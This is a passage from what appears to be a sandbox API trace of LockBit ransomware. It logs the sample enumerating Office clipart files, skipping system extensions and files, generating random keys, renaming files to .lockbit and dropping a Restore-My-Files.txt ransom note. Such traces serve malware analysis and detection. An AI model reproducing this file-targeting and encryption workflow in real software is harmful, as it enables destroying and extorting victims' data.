DirectoryInfo=0x0) returned 1 [0165.164] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.164] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.165] free (_Block=0x1fa2ed8) [0165.165] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.165] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.165] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xff8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02435_.WMF", cAlternateFileName="")) returned 1 [0165.165] lstrcmpiW (lpString1=".", lpString2="NA02435_.WMF") returned -1 [0165.165] lstrcmpiW (lpString1="..", lpString2="NA02435_.WMF") returned -1 [0165.166] PathFindExtensionW (pszPath="NA02435_.WMF") returned=".WMF" [0165.166] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.166] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.167] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.167] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02435_.WMF") returned 1 [0165.168] lstrcmpiW (lpString1="ntldr", lpString2="NA02435_.WMF") returned 1 [0165.168] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02435_.WMF") returned 1 [0165.168] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02435_.WMF") returned -1 [0165.168] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02435_.WMF") returned -1 [0165.168] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02435_.WMF") returned 1 [0165.168] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02435_.WMF") returned -1 [0165.168] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.168] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF") returned=".WMF" [0165.168] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.168] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.169] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.169] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF.lockbit") returned 72 [0165.169] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02435_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.174] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.175] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.175] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4088) returned 1 [0165.175] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.175] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.176] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.178] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.179] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.179] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.180] free (_Block=0x1fa2ed8) [0165.180] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.180] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.180] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1434, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02439_.WMF", cAlternateFileName="")) returned 1 [0165.180] lstrcmpiW (lpString1=".", lpString2="NA02439_.WMF") returned -1 [0165.180] lstrcmpiW (lpString1="..", lpString2="NA02439_.WMF") returned -1 [0165.180] PathFindExtensionW (pszPath="NA02439_.WMF") returned=".WMF" [0165.181] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.181] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.182] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.182] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02439_.WMF") returned 1 [0165.183] lstrcmpiW (lpString1="ntldr", lpString2="NA02439_.WMF") returned 1 [0165.183] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02439_.WMF") returned 1 [0165.183] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02439_.WMF") returned -1 [0165.183] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02439_.WMF") returned -1 [0165.183] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02439_.WMF") returned 1 [0165.183] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02439_.WMF") returned -1 [0165.183] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.183] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF") returned=".WMF" [0165.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.183] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.184] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.184] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF.lockbit") returned 72 [0165.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02439_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0165.186] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.186] malloc (_Size=0x40068) returned 0x3d70450 [0165.186] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5172) returned 1 [0165.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0165.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0165.187] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.192] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.192] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.193] free (_Block=0x1fa2ed8) [0165.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.193] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.194] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3218, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02441_.WMF", cAlternateFileName="")) returned 1 [0165.194] lstrcmpiW (lpString1=".", lpString2="NA02441_.WMF") returned -1 [0165.194] lstrcmpiW (lpString1="..", lpString2="NA02441_.WMF") returned -1 [0165.194] PathFindExtensionW (pszPath="NA02441_.WMF") returned=".WMF" [0165.194] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.194] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.195] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.195] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.196] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02441_.WMF") returned 1 [0165.196] lstrcmpiW (lpString1="ntldr", lpString2="NA02441_.WMF") returned 1 [0165.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02441_.WMF") returned 1 [0165.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02441_.WMF") returned -1 [0165.196] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02441_.WMF") returned -1 [0165.196] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02441_.WMF") returned 1 [0165.196] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02441_.WMF") returned -1 [0165.197] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.197] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF") returned=".WMF" [0165.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.197] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW 